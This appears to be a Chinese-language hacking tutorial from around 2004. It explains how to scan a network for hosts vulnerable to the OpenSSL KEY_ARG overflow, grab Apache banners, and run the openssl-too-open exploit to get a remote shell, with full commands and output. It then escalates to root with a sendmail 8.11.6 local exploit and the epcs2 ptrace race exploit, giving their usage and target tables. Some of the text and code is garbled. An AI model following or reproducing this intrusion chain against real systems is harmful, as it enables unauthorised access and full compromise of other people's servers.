apache_openssl漏洞的利用及權限的提升

apache_openssl漏洞的利用及權限的提升

－－nightcat
轉載請保持文章完整

第一部分：獲得shell.

在packetstorm玩了一段時間，遇到有openssl-too-open.tar.gz這個exploit.
現在看看軟件包的描述：
OpenSSL v0.9.6d and below remote exploit for Apache/mod_ssl servers which takes advantage of the KEY_ARG overflow. Tested against most major Linux distributions. Gives a remote nobody shell on Apache and remote root on other servers. Includes an OpenSSL vulnerability scanner which is more reliable than the RUS-CERT scanner and a detailed vulnerability analysis

這個描述說明這個exploit 是openssl v 0.9.6的key_arg的漏洞來達到溢出的目的。不過也要
注意apache/mod_ssl的版本信息。對於大多數的有這樣條件的都能溢出成功。取得一個id是
nobody shell,有些甚至是root的權限。軟件包裏面有一個掃描器,exploit。

好象聽起來很誘人，down回來研究一下。
nightcat@nightcat$tar -zxvf openssl-too-open.tar.gz
nightcat@nightcat$cd openssl-too-open
Makefile? README? linux-x86.c? main.c? main.h? scanner.c? ssl2.c? ssl2.h

習慣性的要讀一下軟件包的REAMDE文件。
nightcat@nightcat$ more README
得到一些有用的信息：
1.編譯的方法：
直接make就可以，之後就可以得到openssl-too-open和openssl-scanner

2.openssl-too-open的用法：
Usage: ./openssl-too-open [options]
? -a ????????? target architecture (default is 0x00)
? -p ????????? SSL port (default is 443)
? -c ???????????? open N apache connections before sending the shellcode (default is 30)
? -m ???????????? maximum number of open connections (default is 50)
? -v???????????????? verbose mode

Supported architectures:
??????? 0x00 - Gentoo (apache-1.3.24-r2)
??????? 0x01 - Debian Woody GNU/Linux 3.0 (apache-1.3.26-1)
??????? 0x02 - Slackware 7.0 (apache-1.3.26)
??????? 0x03 - Slackware 8.1-stable (apache-1.3.26)
??????? 0x04 - RedHat Linux 6.0 (apache-1.3.6-7)
??????? 0x05 - RedHat Linux 6.1 (apache-1.3.9-4)
??????? 0x06 - RedHat Linux 6.2 (apache-1.3.12-2)
??????? 0x07 - RedHat Linux 7.0 (apache-1.3.12-25)
??????? 0x08 - RedHat Linux 7.1 (apache-1.3.19-5)
??????? 0x09 - RedHat Linux 7.2 (apache-1.3.20-16)
??????? 0x0a - Redhat Linux 7.2 (apache-1.3.26 w/PHP)
??????? 0x0b - RedHat Linux 7.3 (apache-1.3.23-11)
??????? 0x0c - SuSE Linux 7.0 (apache-1.3.12)
??????? 0x0d - SuSE Linux 7.1 (apache-1.3.17)
??????? 0x0e - SuSE Linux 7.2 (apache-1.3.19)
??????? 0x0f - SuSE Linux 7.3 (apache-1.3.20)
??????? 0x10 - SuSE Linux 8.0 (apache-1.3.23-137)
??????? 0x11 - SuSE Linux 8.0 (apache-1.3.23)
??????? 0x12 - Mandrake Linux 7.1 (apache-1.3.14-2)
??????? 0x13 - Mandrake Linux 8.0 (apache-1.3.19-3)
??????? 0x14 - Mandrake Linux 8.1 (apache-1.3.20-3)
??????? 0x15 - Mandrake Linux 8.2 (apache-1.3.23-4)

/****想成功，就要看準系統類型　和apache版本號
*****如果是 0x07 - RedHat Linux 7.0 (apache-1.3.12-25)：
*****./epenssl-too-open -a 0x07 ip? .就應該可以啦！
****/

3.openssl-scanner的用法：
Usage: ./openssl-scanner [options]
? -i ???? file with target hosts
? -o ??? output log
? -a???????????????? append to output log (requires -o)
? -b???????????????? check for big endian servers
? -C???????????????? scan the entire class C network the host belogs to
? -d???????????????? debug mode
? -w N?????????????? connection timeout in seconds

Examples: ./openssl-scanner -d 192.168.0.1
????????? ./openssl-scanner -i hosts -o my.log -w 5
　　　　 ./openssl-scanner -C 192.168.0.0

/****掃描一個c類的ip
*****./openssl-scanner -C 192.168.0.0
****/

?

4.一個實現例子：

$ ./openssl-scanner -C 192.168.0.0
: openssl-scanner : OpenSSL vulnerability scanner
? by Solar Eclipse <[email protected]>

Opening 255 connections . . . . . . . . . . done
Waiting for all connections to finish . . . . . . . . . . . done

192.168.0.136: Vulnerable

$ nc 192.168.0.1 80
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Tue, 17 Sep 2002 17:47:44 GMT
Server: Apache-AdvancedExtranetServer/1.3.20 (Mandrake Linux/3mdk) mod_ssl/2.8.4 OpenSSL/0.9.6b
Connection: close
Content-Type: text/html

./openssl-too-open -a 0x14 192.168.0.1
: openssl-too-open : OpenSSL remote exploit
? by Solar Eclipse <[email protected]>

: Opening 30 connections
? Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses
? ssl0 : 0x810b3a0
? ssl1 : 0x810b360
? ssl2 : 0x810b4e0

* Addresses don't match.

: Opening 40 connections
? Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses
? ssl0 : 0x8103830
? ssl1 : 0x80fd668
? ssl2 : 0x80fd668

* Addresses don't match.

: Opening 50 connections
? Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses
? ssl0 : 0x8103830
? ssl1 : 0x8103830
? ssl2 : 0x8103830

: Sending shellcode
ciphers: 0x8103830?? start_addr: 0x8103770?? SHELLCODE_OFS: 184
? Reading tag
? Execution of stage1 shellcode succeeded, sending stage2
? Spawning shell...

bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a; id; w;
Linux localhost.localdomain 2.4.8-26mdk #1 Sun Sep 23 17:06:39 CEST 2001 i686 unknown
uid=48(apache) gid=48(apache) groups=48(apache)
? 1:49pm? up? 4:26,? 1 user,? load average: 0.04, 0.07, 0.07
USER???? TTY????? FROM????????????? LOGIN@?? IDLE?? JCPU?? PCPU? WHAT
bash-2.05$

整個README 文件已經說的很明白了：
現在是總結一下實現的過程：
1.通過openssl-scanner來掃描一個c段的ip，找到有漏洞的主機，
2.用nc的方法查找banner得到三個目標內容：apache的版本號，openssl的版本號，操作系統版本3.在通過openssl-too-open來進行溢出得到一個shell.

其中第二步，我寫個程序，可以方便得到banner.
/* the www banner scanner .80scanner version 1.0
?*
?* check for the enter ip or daemon to get the banner
?*
?*to complie:
?*user$gcc -o 80scaner 80scanner.c
?*
?*to use:
?*user$./80scanner somedomain.com (i.e. ./80scanner? antionline.com)
?*
?*coded by nightcat
?*march 2004
?*
?* */

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

int main(int argc,char *argv[])
{

int s;
struct in_addr addr;
struct sockaddr_in victem;
struct hostent *bad;
char buffer[1024];

if (argc!=2)
{
exit(printf("/nUsage:%s domain.com /n",argv[0]));
}

if ((bad=gethostbyname(argv[1]))==NULL)
{
exit(printf("Error getting hostname/n"));
}

printf("check? web server version/n");
printf("coded by nighcat/n");

system("sleep 2");

s=socket(AF_INET,SOCK_STREAM,0);
if(s<0) exit(printf("socket error/n"));

bcopy(bad->h_addr,(char *)&victem.sin_addr,bad->h_length);
victem.sin_family=AF_INET;
victem.sin_port=htons(80);

if(connect(s,(struct sockaddr*)&victem,sizeof(victem))<0)
{
exit(printf("connect error/n"));
}
printf("/ngetting http version/n/n");
send(s,"HEAD / HTTP/1.0/n/n",17,0);
recv(s,buffer,sizeof(buffer),0);
printf("version:/n%s",buffer);
close(s);

}
在linux簡單編譯。
nightcat@nightcat$./80banner? www.host.com(172.19.168.1)

第二部分：提升權限

? 我們的目的不是單單得到一個shell.而是得到root.到這裏，我們已經瞭解了主機的系統類型
那好我們找一個local root exploit 就可以得到root.這類exploit實在太多。對於red hat
的系統，我介紹兩個，
一個是sendmail的local root exploit：
1.漏洞說明：
/*
?* local exploit for sendmail 8.11.6
?* by sorbo ([email protected])
?* http://www.darkircop.org
?*
?* This exploit takes advantage of the vulnerable prescan() function that
?* allows the user to input 0xff in order to skip the length check of the buffer.
?*
?* The vulnerability was found by Michal Zalewski
?*
?* The goal is to overwrite the 2 lsb of the saved frame pointer and make it
?* point to an area we control.
?*
?* We can overflow pvpbuf[] in parseaddr() (which calls prescan()) and overwrite
?* parseaddr's saved frame pointer.
?* When parseaddr() returns, the control is back to sendtolist() but the frame pointer
?* will be modified (we make it point to somewhere in pvpbuf).
?* We can't just fill pvpbuf with the ret value we want, since sendtolist() doesn't
?* exit right away, but instead makes use of some variables.
?* We need therefore to construct pvpbuf in an intelligent way, so references to variables
?* will be valid.
?* The first variable to set is delimptr (located at ebp - something).
?* We simply make this point to a 0, so the for loop exits.
?* The next variable to set is al (located at ebp - something ). We need to make a->q_next
?* point to 0 so the while loop exits. a->q_next is a+11*4.
?* The next variable is e (ebp + something). We make it point to a 0
?* The next variable is bufp (ebp - something). This needs to be equal to buf to skip the free.
?* This cannot be done since the address contains a 0xff and this cannot be input in pvpbuf.
?* We just make it point to a valid chunk (in our case... our fake chunk). We can't make it point
?* to stack since arena_for_ptr() will fail. Luckily our arguments get copied on the heap, so we
?* just point it to that.
?* Next we just set the ret (ebp + 4) to our shellcode and when sendtolist() exits our
?* shellcode will be executed. Note shellcode is even copied on heap, so non executable stacks will not
?* stop the exploit (the ret addr must match the shellcode location on the heap though)
?*
?* Note that if we overflow ebp by only one byte (putting a 0) i.e. the classical way
?* will not work since the register will not point to pvpbuf. What we do is overwrite two
?* bytes with 0x005c. Then we fill up the stack (by passing a long argument) so we lower the
?* address of pvpbuf untill it is in the range of the ebp. Also our shellcode will be at a low
?* stack address < 0xbffefefe (since we cannot write 0xff in pvpbuf).
?*
?* NOTE: sendmail 8.12.8 cannot be exploited this way since there is an assert() which cannot
?* be bypassed (in sendtolist()).
?*
?* have fun
?*
?* Greetz: Knight420, Stefano Biondi, nevez
?*
?只要利用prescan()函數長度檢查問題

2.詳細用法：
Local sendmail 8.11.6 exploit by sorbo ([email protected])
Usage: ./sendmail
-h????? this lame message
-t????? target
-b????? brute force

Id????? Description???? pvpbuf????????? zero??????????? chunk?????????? shellcode addr
0)????? Slackware 8.0?? 0xbffdfef4????? 0xbffe15d6????? 0x80f30a0?????? 0xbffe1f36
1)????? Redhat 7.3????? 0xbffdfcd0????? 0xbffe19a6????? 0x80f30a0?????? 0xbffe1f36
2)????? Redhat 7.2????? 0xbffdfcd0????? 0xbffe19a6????? 0x80f30a0?????? 0xbffe1f36

如果是redhat7.2 簡單執行：
.／sendmail -b -t 2　　就可以得到root.

?

另一個是epcs2.c:

/*
?* epcs2 (improved by lst [[email protected]])
?* ~~~~~~~
?* exploit for execve/ptrace race condition in Linux kernel up to 2.2.18
?*
?* originally by:
?* (c) 2001 Wojciech Purczynski / cliph / <[email protected]>
?*
?* improved by:
?* lst [[email protected]]
?*
?* This sploit does _not_ use brute force. It does not need that.
?* It does only one attemt to sploit the race condition in execve.
?* Parent process waits for a context-switch that occur after
?* child task sleep in execve.
?*
?* It should work even on openwall-patched kernels (I haven't tested it).
?*
?* Compile it:
?*????? cc epcs.c -o epcs
?* Usage:
?*????? ./epcs [victim]
?*??????????
?* It gives instant root shell with any of a suid binaries.
?*
?* If it does not work, try use some methods to ensure that execve
?* would sleep while loading binary file into memory,
?*
?*????? i.e.: cat /usr/lib/* >/dev/null 2>&1
?*
?* Tested on RH 7.0 and RH 6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4
?* This exploit does not work on 2.4.x because kernel won't set suid
?* privileges if user ptraces a binary.
?* But it is still exploitable on these kernels.
?*
?* Thanks to Bulba (he made me to take a look at this bug ;) )
?* Greetings to SigSegv team.
?*
?* -- d00t
?* improved by lst [[email protected]]
?* props to kevin for most of the work
?*
?* now works on stack non-exec systems with some neat trickery for the automated
?* method, ie. no need to find the bss segment via objdump
?*
?* particularly it now rewrites the code instruction sets in the
?* dynamic linker _start segment and continues execution from there.
?*
?* an aside, due to the fact that the code self-modified, it wouldnt work
?* quite correctly on a stack non-exec system without playing directly with
?* the bss segment (ie no regs.eip = regs.esp change).? this is much more
?* automated.? however, do note that the previous version did not trigger stack
?* non-exec warnings due to how it was operating.? note that the regs.eip = regs.esp
?* method will break on stack non-exec systems.
?*
?* as always.. enjoy.
?*
?*/
只要利用了execv/ptrace的條件競選。
2.用法：
?* Usage:
?*????? ./epcs [victim]

這個的用法是可以直接執行：
./epcs 就可以得到root. 如果出現enjoy 那就說明可以得到。

?

第三部分：小結

/*****儘量多的瞭解你能瞭解的一切****/
要說的就是：
要明白你所利用的工具的功能，及瞭解爲什麼能這樣利用。纔是我們的真正目的。
入侵只是理解其中道理的一個方法，不要利用我介紹的東西，搞破壞，這個不是我
寫文章的目的。

聯繫我：
qq:1043931
e-mail:[email protected]

?